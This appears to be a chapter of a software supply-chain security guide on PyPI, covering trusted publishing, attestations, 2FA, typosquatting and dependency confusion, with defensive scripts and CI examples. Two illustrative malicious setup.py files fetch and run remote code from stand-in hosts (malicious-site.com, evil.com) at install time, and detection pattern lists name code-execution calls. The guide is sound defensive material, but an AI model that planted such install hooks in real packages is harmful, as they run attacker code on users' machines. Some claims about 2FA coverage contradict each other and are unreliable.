PyPI/Python Ecosystem Security¶
PyPI Ecosystem Overview¶
Scale and Characteristics¶
PyPI serves the Python community with impressive scale and security-focused features:
- 400,000+ packages with steady, quality-focused growth
- ~6 billion downloads per month across all packages
- Trusted publishing with OIDC for secure package uploads
- Digital attestations for package provenance verification
- Strong security policies and incident response procedures
PyPI Security Evolution¶
PyPI has undergone significant security improvements over recent years:
timeline
title PyPI Security Evolution
2018 : Legacy PyPI retirement
: Move to Warehouse (modern codebase)
2019 : 2FA support (TOTP and security keys)
: API token system
: Improved audit logging
2020 : Enhanced monitoring
: Vulnerability reporting program
2021 : Malware detection system
: Improved package scanning
: Security policies enforcement
2022 : Mandatory 2FA for critical projects
: Enhanced threat intelligence
2023 : Trusted publishing (OIDC)
: 2FA requirement announced for all accounts
: Advanced security analytics
2024 : 2FA enforced for all accounts
: Digital attestations (PEP 740)
: Ecosystem-wide security improvements
Trusted Publishing: PyPI's Security Innovation¶
What is Trusted Publishing?¶
Trusted publishing uses OpenID Connect (OIDC) to establish cryptographic trust between PyPI and external systems like GitHub Actions, eliminating the need for long-lived API tokens.
sequenceDiagram
participant GHA as GitHub Actions
participant OIDC as GitHub OIDC Provider
participant PyPI as PyPI
participant Package as Package Registry
Note over GHA,Package: Trusted Publishing Flow
GHA->>OIDC: Request OIDC token for workflow
OIDC->>GHA: Return signed JWT token
GHA->>PyPI: Present OIDC token for authentication
PyPI->>OIDC: Fetch the provider's public signing keys
OIDC->>PyPI: Return signing keys
PyPI->>PyPI: Verify token signature and check claims against project configuration
PyPI->>GHA: Issue short-lived API token scoped to the project
GHA->>Package: Upload package with the short-lived token
Benefits of Trusted Publishing¶
- No Long-lived Secrets: Removes the need to store API tokens in CI/CD environments
- Cryptographic Trust: Uses public key cryptography for verification
- Granular Permissions: Specific repository and workflow authorization
- Audit Trail: Complete logging of publishing actions
- Reduced Attack Surface: No long-lived credentials to steal; the temporary upload credential expires within minutes
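The claim check at the heart of the flow above can be sketched in a few lines. This is a minimal illustration, not PyPI's implementation: the `publisher` dictionary is a hypothetical stand-in for the trusted-publisher record configured on the project, the claim names (`iss`, `repository`, `job_workflow_ref`, `environment`) are the ones GitHub Actions places in its OIDC tokens, and signature verification is deliberately left out.

```python
import base64
import json

GITHUB_ISSUER = "https://token.actions.githubusercontent.com"


def decode_jwt_payload(token):
    """Return the claims of a JWT WITHOUT verifying its signature."""
    payload_b64 = token.split(".")[1]
    # JWT segments drop base64 padding, so restore it before decoding.
    padded = payload_b64 + "=" * (-len(payload_b64) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))


def claims_match_publisher(claims, publisher):
    """Compare OIDC claims with a (hypothetical) trusted-publisher record."""
    repo = f"{publisher['owner']}/{publisher['repository']}"
    workflow_prefix = f"{repo}/.github/workflows/{publisher['workflow']}@"
    if claims.get("iss") != GITHUB_ISSUER:
        return False
    if claims.get("repository") != repo:
        return False
    if not claims.get("job_workflow_ref", "").startswith(workflow_prefix):
        return False
    # The environment is optional; enforce it only when configured.
    environment = publisher.get("environment")
    if environment and claims.get("environment") != environment:
        return False
    return True


publisher = {"owner": "owner", "repository": "repo", "workflow": "publish.yml"}
claims = {
    "iss": GITHUB_ISSUER,
    "repository": "owner/repo",
    "job_workflow_ref": "owner/repo/.github/workflows/publish.yml@refs/heads/main",
}
print(claims_match_publisher(claims, publisher))  # True
```

A real verifier must validate the token signature, audience, and expiry before trusting any claim; the comparison above only shows why a token minted for a different repository or workflow is rejected.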
Setting Up Trusted Publishing¶
# .github/workflows/publish.yml
name: Publish to PyPI
on:
  release:
    types: [published]
jobs:
  publish:
    runs-on: ubuntu-latest
    permissions:
      id-token: write # Required for OIDC token
      contents: read
    steps:
      - uses: actions/checkout@v4
      - name: Set up Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.x'
      - name: Install build dependencies
        run: python -m pip install build
      - name: Build package
        run: python -m build
      - name: Publish to PyPI
        uses: pypa/gh-action-pypi-publish@release/v1
        # No API token needed with trusted publishing!
PyPI Project Configuration:
# Configure trusted publishing on PyPI
1. Go to PyPI project management page
2. Add GitHub as trusted publisher
3. Specify: owner/repository, workflow filename, environment (optional)
4. No API token configuration needed
Digital Attestations and Provenance¶
Package Attestations¶
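PyPI supports digital attestations that provide cryptographic proof of package origins. The statement below illustrates the general shape of an in-toto provenance statement; the schema versions PyPI accepts may differ: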
{
"_type": "https://in-toto.io/Statement/v0.1",
"subject": [
{
"name": "my_package-1.0.0-py3-none-any.whl",
"digest": {
"sha256": "abcd1234..."
}
}
],
"predicateType": "https://slsa.dev/provenance/v0.2",
"predicate": {
"builder": {
"id": "https://github.com/actions/runner/github-hosted"
},
"buildType": "https://github.com/actions/workflow@v1",
"invocation": {
"configSource": {
"uri": "git+https://github.com/owner/repo@refs/heads/main",
"digest": {
"sha1": "def5678..."
}
}
},
"metadata": {
"buildInvocationId": "123456789",
"buildStartedOn": "2023-01-01T00:00:00Z"
}
}
}
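One check a consumer can run on a statement like the one above is that its `subject` entry really describes the file on disk. The sketch below covers only that digest binding; the function names are illustrative, and it assumes the statement has already been extracted from a signed envelope whose signature was verified separately.

```python
import hashlib
from pathlib import Path


def sha256_of(path, chunk_size=65536):
    """Hash a file in chunks so large artifacts need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def subject_matches_file(statement, path):
    """True if the statement lists this file name with its actual SHA-256."""
    name = Path(path).name
    actual = sha256_of(path)
    return any(
        subject.get("name") == name
        and subject.get("digest", {}).get("sha256") == actual
        for subject in statement.get("subject", [])
    )
```

A matching digest proves only that the statement talks about this exact file. Whether the statement itself is trustworthy depends on the signature check described in the next section.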
Verifying Attestations¶
# Install verification tools
pip install sigstore
# Verify a package against its Sigstore bundle
python -m sigstore verify identity \
  --bundle package.whl.sigstore.json \
  --cert-identity https://github.com/owner/repo/.github/workflows/publish.yml@refs/heads/main \
  --cert-oidc-issuer https://token.actions.githubusercontent.com \
  package.whl
PyPI Security Features¶
1. Multi-Factor Authentication¶
PyPI requires 2FA for all accounts as of January 2024; the requirement was first applied to maintainers of critical projects:
# Enable 2FA on PyPI account
1. Visit PyPI account settings
2. Add authentication application (TOTP)
3. Add security keys (FIDO2/WebAuthn) - recommended
4. Download recovery codes
# Critical projects automatically require 2FA
# Affects ~4,000 projects covering ~90% of PyPI downloads
2. API Token Security¶
PyPI provides scoped API tokens with limited permissions:
# Create scoped API token
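1. Generate token scoped to a single project rather than the whole account
2. Store the token as a CI/CD secret, never in the repository
3. Authenticate uploads with username __token__ and the token as the password
4. Revoke and reissue the token if it may have leaked
# Tokens start with "pypi-" followed by a base64-encoded payload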
pypi-AgEIcHlwaS5vcmcCJDAwMDAwMDAwLTAwMDAtMDAwMC0wMDAwLTAwMDAwMDAwMDAwMAACKlsxLCJwcm9qZWN0LXJlYWQiXQAABiAJYWJjZGVmZ2hpams...
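Because tokens issued by pypi.org share the recognizable prefix shown above, leaked tokens can be searched for in source trees and logs. The sketch below is one way to do that; the regular expression and its minimum length of 20 trailing characters are assumptions chosen for illustration, not an official token grammar.

```python
import re

# Assumed pattern: the "pypi-" prefix plus the leading base64 characters
# seen in the example token, followed by at least 20 more token characters.
PYPI_TOKEN_RE = re.compile(r"pypi-AgEIcHlwaS5vcmc[A-Za-z0-9_-]{20,}")


def find_pypi_tokens(text):
    """Return (line_number, redacted_token) for each token-like string."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        for match in PYPI_TOKEN_RE.finditer(line):
            # Redact so the scanner's own output never leaks the secret.
            findings.append((number, match.group(0)[:12] + "..."))
    return findings


sample = "username = __token__\npassword = pypi-AgEIcHlwaS5vcmc" + "A" * 40
print(find_pypi_tokens(sample))  # [(2, 'pypi-AgEIcHl...')]
```

Any hit should be treated as a compromised credential: revoke the token on PyPI first, then remove it from history.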
3. Malware Detection¶
PyPI implements automated malware detection:
# Illustrative patterns of the kind malware scanners flag
suspicious_patterns = [
"eval(base64.b64decode(", # Base64 encoded execution
"exec(compile(", # Dynamic compilation
"__import__('os').system(", # OS command execution
"socket.socket(", # Network connections
"subprocess.Popen(", # Process spawning
]
# PyPI scanning process
1. Automated scanning of all uploaded packages
2. Machine learning-based malware detection
3. Human review for suspicious packages
4. Rapid response for confirmed malware
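Substring patterns like those above also match comments and string literals. A syntax-aware check avoids that class of false positive. The following is a minimal sketch using the standard `ast` module; the two sets of risky names are illustrative choices, not a list taken from PyPI's scanner.

```python
import ast

RISKY_BUILTINS = {"eval", "exec", "compile", "__import__"}
RISKY_ATTRIBUTES = {"os.system", "subprocess.Popen", "socket.socket"}


def find_risky_calls(source):
    """Return sorted (line, name) pairs for calls to risky functions."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if isinstance(func, ast.Name) and func.id in RISKY_BUILTINS:
            findings.append((node.lineno, func.id))
        elif isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
            dotted = f"{func.value.id}.{func.attr}"
            if dotted in RISKY_ATTRIBUTES:
                findings.append((node.lineno, dotted))
    return sorted(findings)


sample = 'import os\nos.system("id")\nvalue = eval("1 + 1")\n'
print(find_risky_calls(sample))  # [(2, 'os.system'), (3, 'eval')]
```

The parser never executes the code it inspects. Aliased imports and obfuscated calls still slip past a check this simple, so findings are leads for review rather than verdicts.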
4. Package Integrity¶
PyPI ensures package integrity through multiple mechanisms:
# SHA256 hashes for all files
https://files.pythonhosted.org/packages/a1/b2/c3.../package-1.0.0.tar.gz
# Hash: sha256:<64-hex-digit digest>
# Package verification: --hash is only valid inside a requirements file
# requirements.txt
package==1.0.0 --hash=sha256:<64-hex-digit digest>
# Install, rejecting any file whose hash does not match
pip install --require-hashes -r requirements.txt
Python Package Installation Security¶
pip Installation Process¶
Understanding pip's installation process reveals security considerations:
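# pip install security analysis
1. Resolve package dependencies from PyPI
2. Download package files (wheel or source)
3. Verify package integrity (SHA256) when hashes are pinned
4. Build source distributions into wheels (runs setup.py or the build backend)
5. Install package files
# Wheels have no install-time hooks, so arbitrary code runs at the build step,
# not while files are copied into place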
Security Implications¶
# setup.py can execute arbitrary code
from setuptools import setup
import os
import subprocess
# This code runs during installation!
os.system("curl -s malicious-site.com/script.sh | bash")
setup(
name="malicious-package",
version="1.0.0",
# ... package configuration
)
Secure Installation Practices¶
# Use specific versions and hashes (hashes are listed in the requirements file)
pip install --require-hashes -r requirements.txt
# Install from wheels only (no setup.py execution)
pip install package --only-binary=:all:
# Use virtual environments for isolation
python -m venv myenv
source myenv/bin/activate
pip install package
# Check package before installation (wheel only, so no build code runs)
pip download package --no-deps --only-binary=:all:
# Inspect contents before installing
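A downloaded wheel is a zip archive, so its contents can be listed without installing or importing anything. The helper below is a minimal sketch; the function name and the choice to flag only `.pth` files (which the interpreter processes at startup and which can carry executable `import` lines) are illustrative.

```python
import zipfile


def inspect_wheel(wheel_path):
    """List a wheel's files and flag entries that merit a closer look."""
    with zipfile.ZipFile(wheel_path) as archive:
        names = archive.namelist()
    # .pth files are read by the site module on every interpreter start.
    flagged = [name for name in names if name.endswith(".pth")]
    return {"files": names, "flagged": flagged}
```

Calling `inspect_wheel("package-1.0.0-py3-none-any.whl")` on a file fetched with `pip download` returns the file list for manual review. Individual members can then be read with `zipfile.ZipFile.read` and scanned as text.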
Common PyPI Attack Vectors¶
1. Typosquatting¶
Despite security measures, typosquatting remains a concern:
# Legitimate packages vs illustrative typosquat-style variants
requests -> request, requsts, reqeusts
numpy -> nympy, numpi, numpy-dev
django -> djago, django-admin, djangos
flask -> falsk, flaks, flasks
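Names like the variants above sit within one or two edits of the package they imitate, which makes edit distance a simple first filter. The sketch below assumes a hand-maintained list of popular names and a threshold of two edits; both are illustrative choices.

```python
def edit_distance(a, b):
    """Levenshtein distance via the classic dynamic-programming recurrence."""
    previous = list(range(len(b) + 1))
    for i, char_a in enumerate(a, start=1):
        current = [i]
        for j, char_b in enumerate(b, start=1):
            cost = 0 if char_a == char_b else 1
            current.append(min(
                previous[j] + 1,         # deletion
                current[j - 1] + 1,      # insertion
                previous[j - 1] + cost,  # substitution
            ))
        previous = current
    return previous[-1]


def likely_typosquat_of(name, popular, max_distance=2):
    """Return the popular package this name closely imitates, or None."""
    name = name.lower()
    for known in popular:
        if name != known and edit_distance(name, known) <= max_distance:
            return known
    return None


popular = ["requests", "numpy", "django", "flask"]
print(likely_typosquat_of("requsts", popular))   # requests
print(likely_typosquat_of("requests", popular))  # None
```

Short names produce many near neighbours, so a real check would pair this with download counts or an allowlist before raising an alert.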
2. Dependency Confusion¶
Exploiting package name resolution:
# Example attack scenario
# 1. Attacker identifies internal package name
# 2. Publishes package with same name to PyPI
# 3. Developer accidentally installs public version
# Protection: resolve only from a private package index
# (--extra-index-url still consults public PyPI, so avoid it for internal names)
pip install package --index-url https://private-pypi.company.com/
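The first step of the attack scenario can be turned into a defensive check: find out which internal names are already claimed on public PyPI. The sketch below queries the same JSON endpoint used elsewhere in this document; the function names are illustrative, and the lookup is injectable so the logic can be exercised offline.

```python
import urllib.error
import urllib.request


def exists_on_public_pypi(name):
    """Query PyPI's JSON API; a 404 means the name is unclaimed."""
    url = f"https://pypi.org/pypi/{name}/json"
    try:
        with urllib.request.urlopen(url, timeout=10) as response:
            return response.status == 200
    except urllib.error.HTTPError as error:
        if error.code == 404:
            return False
        raise


def find_public_collisions(internal_names, exists=exists_on_public_pypi):
    """Return the internal package names that also exist on public PyPI."""
    return [name for name in internal_names if exists(name)]
```

Running `find_public_collisions(["internal-billing", "internal-auth"])` (hypothetical names) against the live index shows which packages need attention. An unexpected hit suggests either a squatted name or a publishing mistake.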
3. Setup.py Exploitation¶
Malicious code in setup.py files:
# Example malicious setup.py
from setuptools import setup
import base64
import urllib.request
# Download and execute malicious payload
payload = urllib.request.urlopen('https://evil.com/payload.py').read()
exec(compile(base64.b64decode(payload), '<string>', 'exec'))
setup(name='innocent-package', version='1.0.0')
4. Package Takeover¶
Compromising existing packages:
- Account compromise: Stealing maintainer credentials
- Social engineering: Convincing maintainers to add attackers
- Package abandonment: Taking over unmaintained packages
- Transfer exploitation: Exploiting package ownership transfers
Advanced PyPI Security¶
1. Private Package Repositories¶
Setting up secure private PyPI repositories:
# Using devpi for private PyPI
pip install devpi-server devpi-client
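# Initialize and start devpi server (recent releases use devpi-init instead of --start)
devpi-init
devpi-server --port 3141
# Configure client (in a second terminal)
devpi use http://localhost:3141
devpi user -c testuser password=<strong-password>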
devpi login testuser
devpi index -c dev
# Upload private packages
devpi upload
2. Package Verification Scripts¶
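#!/usr/bin/env python3
"""
PyPI Package Security Verification Script
"""
import hashlib
import json
import re
from datetime import datetime, timezone
from pathlib import Path

import requests


class PyPISecurityVerifier:
    def __init__(self):
        # Matches are leads for manual review, not proof of malice
        self.suspicious_patterns = [
            r'eval\s*\(',
            r'exec\s*\(',
            r'__import__\s*\(',
            r'subprocess\.',
            r'os\.system',
            r'socket\.socket',
            r'urllib\.request',
            r'base64\.b64decode',
        ]

    def check_package_metadata(self, package_name):
        """Check package metadata for suspicious indicators."""
        url = f"https://pypi.org/pypi/{package_name}/json"
        response = requests.get(url, timeout=30)
        if response.status_code != 200:
            return {"error": "Package not found"}
        data = response.json()
        info = data['info']
        # maintainer_email can be null in the API response
        emails = (info.get('maintainer_email') or '').split(',')
        # Security checks
        checks = {
            "package_age": self._check_package_age(data),
            "maintainer_count": len([e for e in emails if e.strip()]),
            "download_stats": self._get_download_stats(package_name),
            "version_frequency": self._check_version_frequency(data),
            "has_source_distribution": self._has_source_distribution(data),
        }
        return checks

    def analyze_source_code(self, package_path):
        """Analyze package source code for suspicious patterns."""
        suspicious_files = []
        for py_file in Path(package_path).rglob("*.py"):
            with open(py_file, 'r', encoding='utf-8', errors='ignore') as f:
                content = f.read()
            # Check for suspicious patterns
            for pattern in self.suspicious_patterns:
                if re.search(pattern, content):
                    suspicious_files.append({
                        "file": str(py_file),
                        "pattern": pattern,
                        "line": self._find_line_number(content, pattern)
                    })
        return suspicious_files

    def verify_package_integrity(self, package_name, version):
        """Verify package integrity using PyPI checksums."""
        url = f"https://pypi.org/pypi/{package_name}/{version}/json"
        response = requests.get(url, timeout=30)
        response.raise_for_status()
        data = response.json()
        files = data['urls']
        verification_results = []
        for file_info in files:
            file_url = file_info['url']
            expected_hash = file_info['digests']['sha256']
            # Download and verify
            file_response = requests.get(file_url, timeout=60)
            file_response.raise_for_status()
            actual_hash = hashlib.sha256(file_response.content).hexdigest()
            verification_results.append({
                "filename": file_info['filename'],
                "expected_hash": expected_hash,
                "actual_hash": actual_hash,
                "verified": expected_hash == actual_hash
            })
        return verification_results

    def _upload_times(self, data):
        """Sorted upload timestamps across every file of every release."""
        times = []
        for files in data.get('releases', {}).values():
            for file_info in files:
                stamp = file_info.get('upload_time_iso_8601')
                if stamp:
                    times.append(datetime.fromisoformat(stamp.replace('Z', '+00:00')))
        return sorted(times)

    def _check_package_age(self, data):
        """Days since the first file was uploaded, or None if unknown."""
        times = self._upload_times(data)
        if not times:
            return None
        return (datetime.now(timezone.utc) - times[0]).days

    def _get_download_stats(self, package_name):
        # The JSON API does not report download counts; plug in an
        # external statistics source here if one is available.
        return None

    def _check_version_frequency(self, data):
        """Total number of releases, a crude activity signal."""
        return len(data.get('releases', {}))

    def _has_source_distribution(self, data):
        """True if the latest release ships an sdist alongside any wheels."""
        return any(f.get('packagetype') == 'sdist' for f in data.get('urls', []))

    def _find_line_number(self, content, pattern):
        """First line on which the pattern matches, or None."""
        for number, line in enumerate(content.splitlines(), start=1):
            if re.search(pattern, line):
                return number
        return None


# Usage example
if __name__ == "__main__":
    verifier = PyPISecurityVerifier()
    results = verifier.check_package_metadata("requests")
    print(json.dumps(results, indent=2))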
3. Dependency Pinning and Lock Files¶
# requirements.txt with hashes
requests==2.31.0 \
--hash=sha256:58cd2187c01e70e6e26505bca751777aa9f2ee0b7f4300988b709f44e013003f \
--hash=sha256:942c5a758f98d790eaed1a29cb6eefc7ffb0d1cf7af05c3d2791656dbd6ad1e1
# Using pip-tools for dependency management
pip install pip-tools
# Create requirements.in
echo "requests" > requirements.in
# Generate locked requirements with hashes
pip-compile --generate-hashes requirements.in
# Install with verification
pip-sync requirements.txt
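A lock file only protects an install if every entry is both pinned and hashed. The check below is a simplified sketch for files in the style that `pip-compile --generate-hashes` produces; it is not a full requirements parser, and it assumes specifiers are written without spaces around `==`.

```python
def unpinned_or_unhashed(requirements_text):
    """Return requirement entries lacking an exact pin or a --hash option."""
    # Join backslash-continued lines into one logical line per requirement.
    logical_lines = requirements_text.replace("\\\n", " ").splitlines()
    problems = []
    for line in logical_lines:
        line = line.split(" #")[0].strip()  # drop trailing comments
        if not line or line.startswith(("#", "-")):
            continue  # skip blanks, comments, and options such as --index-url
        requirement = line.split()[0]
        if "==" not in requirement or "--hash=" not in line:
            problems.append(requirement)
    return problems


sample = (
    "requests==2.31.0 \\\n"
    "    --hash=sha256:aaa \\\n"
    "    --hash=sha256:bbb\n"
    "flask>=2.0\n"
    "numpy==1.26.0\n"
)
print(unpinned_or_unhashed(sample))  # ['flask>=2.0', 'numpy==1.26.0']
```

Run as a CI gate, a non-empty result can fail the build before `pip` ever contacts an index. The hash values in `sample` are placeholders.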
4. CI/CD Security for Python Projects¶
# Secure Python CI/CD pipeline
name: Python Security Pipeline
on: [push, pull_request]
jobs:
  security:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Set up Python
        uses: actions/setup-python@v4
        with:
          python-version: '3.11'
      - name: Install security tools
        run: |
          pip install safety bandit semgrep
      - name: Check for known vulnerabilities
        run: |
          # Check for vulnerable packages
          safety check
      - name: Static security analysis
        run: |
          # Security linting with bandit
          bandit -r src/
      - name: Semantic security analysis
        run: |
          # Advanced pattern matching
          semgrep --config=auto src/
      - name: Dependency analysis
        run: |
          # Generate an SBOM for the installed environment
          pip install cyclonedx-bom
          cyclonedx-py environment -o sbom.json
      - name: Upload SBOM
        # upload-artifact v3 is deprecated and no longer runs on GitHub-hosted runners
        uses: actions/upload-artifact@v4
        with:
          name: python-sbom
          path: sbom.json
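Once the pipeline stores an SBOM per build, two of them can be compared to see which dependencies appeared or changed. The sketch below assumes CycloneDX JSON with a top-level `components` array whose entries carry `name` and `version`; the function names are illustrative.

```python
import json


def sbom_components(sbom_text):
    """Return {name: version} for each component in a CycloneDX JSON SBOM."""
    sbom = json.loads(sbom_text)
    return {
        component["name"]: component.get("version", "")
        for component in sbom.get("components", [])
        if "name" in component
    }


def changed_components(old_sbom_text, new_sbom_text):
    """Components that are new or whose version changed between two SBOMs."""
    old = sbom_components(old_sbom_text)
    new = sbom_components(new_sbom_text)
    return {name: version for name, version in new.items() if old.get(name) != version}
```

Feeding the previous and current `sbom.json` into `changed_components` yields a short review list, which is easier to audit than the full inventory on every build.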
PyPI vs Other Ecosystems¶
Security Feature Comparison¶
Feature | PyPI | npm | Maven Central | NuGet |
---|---|---|---|---|
Trusted Publishing | ✅ Full OIDC support | ✅ OIDC support (since 2025) | ❌ Not available | ❌ Not available |
Digital Attestations | ✅ Full support | ✅ Provenance attestations | ❌ Not available | ❌ Not available |
Mandatory 2FA | ✅ Critical projects | 🔶 High-impact packages | ❌ Optional | ❌ Optional |
Malware Detection | ✅ Automated + manual | 🔶 Basic detection | 🔶 Basic scanning | 🔶 Basic scanning |
Package Signing | ✅ Built-in attestations | 🔶 Experimental | ✅ PGP signing | ✅ Code signing |
What Other Ecosystems Can Learn¶
- Trusted Publishing Model: Eliminates long-lived secrets in CI/CD
- Proactive Security Policies: Mandatory 2FA for critical projects
- Comprehensive Attestations: Full provenance tracking
- Community Engagement: Active security community involvement
- Rapid Incident Response: Quick response to security issues
Developer Environment Protection¶
1. Virtual Environment Security¶
# Secure virtual environment practices
python -m venv --prompt="secure-project" venv
source venv/bin/activate
# Verify environment isolation
which python
which pip
# Install with verification
pip install --require-hashes -r requirements.txt
# Regular environment cleanup
deactivate
rm -rf venv
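The `which python` check above has a programmatic counterpart that install scripts can use to refuse to run outside an environment. This is a minimal sketch that relies on `sys.prefix` and `sys.base_prefix` differing inside a `venv`; the function names are illustrative.

```python
import sys


def in_virtual_environment():
    """True when the interpreter runs inside a venv-style environment."""
    return sys.prefix != sys.base_prefix


def require_virtual_environment():
    """Abort early rather than install into the system interpreter."""
    if not in_virtual_environment():
        raise RuntimeError("Refusing to continue outside a virtual environment")
```

Calling `require_virtual_environment()` at the top of a bootstrap script turns an easy-to-miss mistake into an immediate, explicit failure.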
2. Package Installation Monitoring¶
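# Monitor package imports
import builtins
from functools import wraps

# Hypothetical blocklist; populate it from your own threat intelligence
SUSPICIOUS_PACKAGES = {"requsts", "nympy", "djago", "falsk"}


def is_suspicious_package(package_name):
    """Check the top-level package name against the blocklist."""
    return package_name.split(".")[0] in SUSPICIOUS_PACKAGES


def monitor_imports(func):
    @wraps(func)
    def wrapper(*args, **kwargs):
        if args and isinstance(args[0], str):
            package_name = args[0]
            print(f"🔍 Importing package: {package_name}")
            # Check for suspicious packages
            if is_suspicious_package(package_name):
                print(f"⚠️ Warning: Suspicious package detected: {package_name}")
        return func(*args, **kwargs)
    return wrapper


# Patch import mechanism (the builtins module behaves the same in every
# module, unlike __builtins__, which may be a dict)
original_import = builtins.__import__
builtins.__import__ = monitor_imports(original_import)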
3. Sandboxed Development¶
# Using containers for Python development
# Dockerfile.python-dev
FROM python:3.11-slim
# Create non-root user
RUN useradd -m -u 1000 developer
# Install security tools
RUN pip install safety bandit
# Set up workspace
WORKDIR /workspace
RUN chown developer:developer /workspace
# Switch to non-root user
USER developer
# Entry point
CMD ["bash"]
Incident Response: PyPI Security Breaches¶
Historical Incidents¶
- 2019 - jeIlyfish Package: Typosquat of jellyfish (capital I in place of the first l) that stole SSH and GPG keys
- 2020 - Python Package Backdoor: Banking trojan distribution
- 2021 - Dependency Confusion: Major companies affected
- 2022 - Crypto Package Attacks: Multiple malicious packages
PyPI's Response Improvements¶
- Automated Detection: Machine learning-based malware detection
- Rapid Response: Sub-hour response times for confirmed threats
- Community Reporting: Easy reporting mechanisms for users
- Transparency: Public incident reports and lessons learned
Lessons for Organizations¶
# PyPI Incident Response Lessons
## Prevention
- Implement trusted publishing where possible
- Use package verification and attestations
- Maintain comprehensive package inventories
- Regular security training for developers
## Detection
- Monitor package installations and updates
- Implement SBOM tracking and analysis
- Use automated vulnerability scanning
- Establish baseline behavior patterns
## Response
- Have pre-planned incident response procedures
- Maintain communication channels with package maintainers
- Implement rapid rollback capabilities
- Document lessons learned for future improvement
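The inventory item under Prevention can start from what is installed in each environment. The sketch below uses the standard `importlib.metadata` module; the function name and the choice to lowercase names are illustrative.

```python
from importlib import metadata


def installed_inventory():
    """Return {package_name: version} for the current environment."""
    inventory = {}
    for dist in metadata.distributions():
        name = dist.metadata.get("Name")
        if name:  # skip distributions with broken metadata
            inventory[name.lower()] = dist.version
    return dict(sorted(inventory.items()))
```

Snapshots taken with `installed_inventory()` before and after an incident give responders a concrete list of what changed, and the same data can be checked against advisories for affected versions.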
Future of PyPI Security¶
Ongoing Initiatives¶
- SLSA Framework Integration: Enhanced supply chain security standards
- Sigstore Adoption: Keyless signing for all packages
- Machine Learning Enhancement: Improved threat detection
- Cross-Ecosystem Collaboration: Sharing security innovations
Recommended Practices¶
- Adopt Trusted Publishing: Eliminate long-lived tokens
- Verify Attestations: Check package provenance
- Use Security Tools: Integrate safety, bandit, and others
- Stay Informed: Follow PyPI security announcements
- Contribute Back: Report issues and improve ecosystem security
Conclusion¶
PyPI has emerged as a security leader among package ecosystems, showing how proactive measures can raise the baseline for everyone who publishes or installs packages. Key innovations include:
- Trusted Publishing: Eliminating long-lived secrets
- Digital Attestations: Cryptographic provenance verification
- Proactive Policies: Mandatory 2FA for critical projects
- Community Engagement: Active security community involvement
The next section covers Maven/Java Ecosystem Security, which has its own unique security characteristics and challenges.